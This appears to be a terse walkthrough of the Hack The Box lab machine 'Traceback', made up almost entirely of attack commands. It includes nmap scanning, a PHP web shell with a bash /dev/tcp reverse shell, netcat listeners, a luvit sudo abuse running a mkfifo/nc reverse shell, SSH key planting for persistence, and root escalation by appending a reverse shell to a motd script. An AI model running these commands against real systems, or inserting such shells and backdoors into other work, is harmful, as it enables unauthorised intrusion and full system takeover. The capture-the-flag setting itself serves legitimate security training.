vi /etc/hosts  traceback

nmap -A -o traceback/nmap

ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
httpd Apache httpd 2.4.29

Google for the comment, some of the best web shells that you might need

`-> login page

in your attacker machine,

vi rev.php

exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'"); 

Upload the file and then set up a netcat listener in your attacker machine:

nc -nvlp 4444

send a request to traceback/rev.php

You should have a reverse shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

cd ~
cat note.txt

sudo -l

You will see where the file is.


Now, you can execute a shell command to get a reverse shell back in your machine.

In attacker machine,

nc -nvlp 1234

sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f")'

Now, you should get a reverse shell.

Now, set up a ssh way in to the machine.
In your attacker machine:

(echo "\n\n"; echo ~/.ssh/id_rsa.pub; echo "\n\n") > ~/hackthebox/traceback/www/test.txt
python -m SimpleHTTPServer

As webadmin,

cd ~/.ssh
echo test.txt >> authorized_keys
rm test.txt


For privesc,

ps aux | grep root

You should see that, root is copying replacing /etc/update-motd.d/ files every 30 seconds.

ls -al /etc/update-motd.d/

You can see that you have write and execute privileges in this file.
This header gets displayed everytime you ssh into this box.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 2345 >/tmp/f" >> /etc/update-motd.d/00-header

Now, in your attacking machine, you will need two windows.
In one, run,
nc -nvlp 2345
This is so that you can catch the reverse shell that gets sent when the 00-header file runs.

In the other tab,
ssh webadmin@

And boom, you should get a reverse shell as root!

cat ~/root.txt